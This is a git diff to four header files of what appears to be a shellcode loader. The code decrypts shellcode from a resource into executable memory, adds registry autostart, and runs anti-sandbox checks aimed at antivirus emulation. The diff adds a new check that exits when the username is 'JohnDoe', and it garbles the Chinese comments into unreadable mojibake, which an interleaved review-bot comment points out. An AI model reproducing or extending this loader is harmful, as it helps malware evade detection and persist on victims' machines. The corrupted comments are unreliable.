diff --git a/plug/Dynamic Load plus/public.hpp b/plug/Dynamic Load plus/public.hpp
index 4376bfc..6bae130 100644
--- a/plug/Dynamic Load plus/public.hpp
+++ b/plug/Dynamic Load plus/public.hpp
@@ -90,7 +90,7 @@ void AntiSimulation()
 {
 procnum++;
 }
- if (procnum <= 40) //判断当前进程是否低于40个,目前见过能模拟最多进程的是WD能模拟39个
+ if (procnum <= 40) //鍒ゆ柇褰撳墠杩涚▼鏄惁浣庝簬40涓紝鐩墠瑙佽繃鑳芥ā鎷熸渶澶氳繘绋嬬殑鏄疻D鑳芥ā鎷39涓
 {
 exit(1);
 }
@@ -123,11 +123,11 @@ void AutoStart()
 **********************************************************************/
 void init(BOOL anti_sandbox, BOOL autostart)
 {
- if (anti_sandbox) //反仿真
+ if (anti_sandbox) //鍙嶄豢鐪
 {
 AntiSimulation();
 }
- if (autostart) //注册表添加自启动
+ if (autostart) //娉ㄥ唽琛ㄦ坊鍔犺嚜鍚姩
 {
 AutoStart();
 }
@@ -228,4 +228,4 @@ unsigned char* GetShellcodeFromRes(int resourceID, UINT &shellcodeSize)
 memcpy(shellcode, (unsigned char*)pBuffer + sizeof(CONFIG), shellcodeSize);
 StreamCrypt(shellcode, shellcodeSize, config.key, 128);
 return shellcode;
-}
\ No newline at end of file
+}
diff --git a/plug/Dynamic Load/public.hpp b/plug/Dynamic Load/public.hpp
index 4ae8967..03efe61 100644
--- a/plug/Dynamic Load/public.hpp
+++ b/plug/Dynamic Load/public.hpp
@@ -5,6 +5,9 @@ typedef HRSRC(WINAPI *pfnFindResourceW)(HMODULE hModule, LPCWSTR lpName, LPCWSTR
 typedef DWORD(WINAPI *pfnSizeofResource)(HMODULE hModule, HRSRC hResInfo);
 typedef HGLOBAL(WINAPI *pfnLoadResource)(HMODULE hModule, HRSRC hResInfo);
 typedef LPVOID(WINAPI *pfnLockResource)(HGLOBAL hResData);
+#define numSandboxUser 1
+const WCHAR* sandboxUsername[numSandboxUser] = { L"JohnDoe" };
+
 /**********************************************************************
 * @Function: GetShellcodeFromRes(int resourceID, UINT &shellcodeSize)
@@ -79,6 +82,9 @@ struct CONFIG
 **********************************************************************/
 void AntiSimulation()
 {
+ WCHAR username[3267];
+ DWORD charCount = 3267;
+
 HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
 if (INVALID_HANDLE_VALUE == hSnapshot)
 {
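Review bot: The `+` line in this hunk replaces the readable Chinese comment on `if (procnum <= 40)` with mojibake; the byte pattern looks like a GBK-encoded comment that was decoded as UTF-8 and re-saved, so the new comment cannot be read under any encoding. The same corruption is in the `init` hunks of all four files, in the `AntiSimulation` process-count hunks of the Dynamic Load, TLS Callback Load and plug/public.hpp sections, and in the `//3.Getshellcode` line of the TLS Callback Load section. The text on the `-` lines should be kept and the files saved once in a single declared encoding (UTF-8 is the usual choice when several editors touch a repo), since a comment nobody can read is worse than none. `AntiSimulation`'s body starts before this hunk.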
@@ -90,10 +96,21 @@ void AntiSimulation()
 {
 procnum++;
 }
- if (procnum <= 40) //判断当前进程是否低于40个,目前见过能模拟最多进程的是WD能模拟39个
+ if (procnum <= 40) //鍒ゆ柇褰撳墠杩涚▼鏄惁浣庝簬40涓紝鐩墠瑙佽繃鑳芥ā鎷熸渶澶氳繘绋嬬殑鏄疻D鑳芥ā鎷39涓
 {
 exit(1);
 }
+
+ if (!GetUserName(username, &charCount)) {
+ return;
+ }
+ for (int i = 0; i < numSandboxUser; ++i) {
+ if (wcsicmp(username, sandboxUsername[i]) == 0) {
+ exit(1);
+ }
+
+ }
+
 }
 /**********************************************************************
@@ -123,11 +140,11 @@ void AutoStart()
 **********************************************************************/
 void init(BOOL anti_sandbox, BOOL autostart)
 {
- if (anti_sandbox) //反仿真
+ if (anti_sandbox) //鍙嶄豢鐪
 {
 AntiSimulation();
 }
- if (autostart) //注册表添加自启动
+ if (autostart) //娉ㄥ唽琛ㄦ坊鍔犺嚜鍚姩
 {
 AutoStart();
 }
@@ -165,4 +182,4 @@ unsigned char* GetShellcodeFromRes(int resourceID, UINT &shellcodeSize)
 memcpy(shellcode, (unsigned char*)pBuffer + sizeof(CONFIG), shellcodeSize);
 StreamCrypt(shellcode, shellcodeSize, config.key, 128);
 return shellcode;
-}
\ No newline at end of file
+}
diff --git a/plug/TLS Callback Load/public.hpp b/plug/TLS Callback Load/public.hpp
index 0dc3e4f..405f39e 100644
--- a/plug/TLS Callback Load/public.hpp
+++ b/plug/TLS Callback Load/public.hpp
@@ -88,7 +88,7 @@ void AntiSimulation()
 {
 procnum++;
 }
- if (procnum <= 40) //判断当前进程是否低于40个,目前见过能模拟最多进程的是WD能模拟39个
+ if (procnum <= 40) //鍒ゆ柇褰撳墠杩涚▼鏄惁浣庝簬40涓紝鐩墠瑙佽繃鑳芥ā鎷熸渶澶氳繘绋嬬殑鏄疻D鑳芥ā鎷39涓
 {
 exit(1);
 }
@@ -121,11 +121,11 @@ void AutoStart()
 **********************************************************************/
 void init(BOOL anti_sandbox, BOOL autostart)
 {
- if (anti_sandbox) //反仿真
+ if (anti_sandbox) //鍙嶄豢鐪
 {
 AntiSimulation();
 }
- if (autostart) //注册表添加自启动
+ if (autostart) //娉ㄥ唽琛ㄦ坊鍔犺嚜鍚姩
 {
 AutoStart();
 }
@@ -151,8 +151,8 @@ void GetShellcodeFromRes(int resourceID, UINT &shellcodeSize)
 //2.Initialization
 memcpy(&config, pBuffer, sizeof(CONFIG));
 init(config.antisandbox, config.autostart);
- //3.Getshellcode //TLS回调函数中不能使用new分配内存,否则会出现访问错误,所以直接分配可执行内存
+ //3.Getshellcode //TLS鍥炶皟鍑芥暟涓笉鑳戒娇鐢╪ew鍒嗛厤鍐呭瓨锛屽惁鍒欎細鍑虹幇璁块棶閿欒锛屾墍浠ョ洿鎺ュ垎閰嶅彲鎵ц鍐呭瓨
 Memory = VirtualAlloc(NULL, totalSize - sizeof(CONFIG), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
 memcpy(Memory, (char *)pBuffer + sizeof(CONFIG), totalSize - sizeof(CONFIG));
 StreamCrypt((unsigned char*)Memory, totalSize - sizeof(CONFIG), config.key, 128);
-}
\ No newline at end of file
+}
diff --git a/plug/public.hpp b/plug/public.hpp
index 625effc..f9e825d 100644
--- a/plug/public.hpp
+++ b/plug/public.hpp
@@ -1,5 +1,7 @@
 #include
 #include
+#define numSandboxUser 1
+const WCHAR* sandboxUsername[numSandboxUser] = { L"JohnDoe" };
 /**********************************************************************
 * @Function: GetShellcodeFromRes(int resourceID, UINT &shellcodeSize)
@@ -75,6 +77,9 @@ struct CONFIG
 **********************************************************************/
 void AntiSimulation()
 {
+ WCHAR username[3267];
+ DWORD charCount = 3267;
+
 HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
 if (INVALID_HANDLE_VALUE == hSnapshot)
 {
@@ -86,10 +91,21 @@ void AntiSimulation()
 {
 procnum++;
 }
- if (procnum <= 40) //判断当前进程是否低于40个,目前见过能模拟最多进程的是WD能模拟39个
+ if (procnum <= 40) //鍒ゆ柇褰撳墠杩涚▼鏄惁浣庝簬40涓紝鐩墠瑙佽繃鑳芥ā鎷熸渶澶氳繘绋嬬殑鏄疻D鑳芥ā鎷39涓
 {
 exit(1);
 }
+
+ if (!GetUserName(username, &charCount)) {
+ return;
+ }
+ for (int i = 0; i < numSandboxUser; ++i) {
+ if (wcsicmp(username, sandboxUsername[i]) == 0) {
+ exit(1);
+ }
+
+ }
+
 }
 /**********************************************************************
@@ -119,11 +135,11 @@ void AutoStart()
 **********************************************************************/
 void init(BOOL anti_sandbox, BOOL autostart)
 {
- if (anti_sandbox) //反仿真
+ if (anti_sandbox) //鍙嶄豢鐪
 {
 AntiSimulation();
 }
- if (autostart) //注册表添加自启动
+ if (autostart) //娉ㄥ唽琛ㄦ坊鍔犺嚜鍚姩
 {
 AutoStart();
 }
@@ -154,4 +170,4 @@ unsigned char* GetShellcodeFromRes(int resourceID, UINT &shellcodeSize)
 memcpy(shellcode, (unsigned char*)pBuffer + sizeof(CONFIG), shellcodeSize);
 StreamCrypt(shellcode, shellcodeSize, config.key, 128);
 return shellcode;
-}
\ No newline at end of file
+}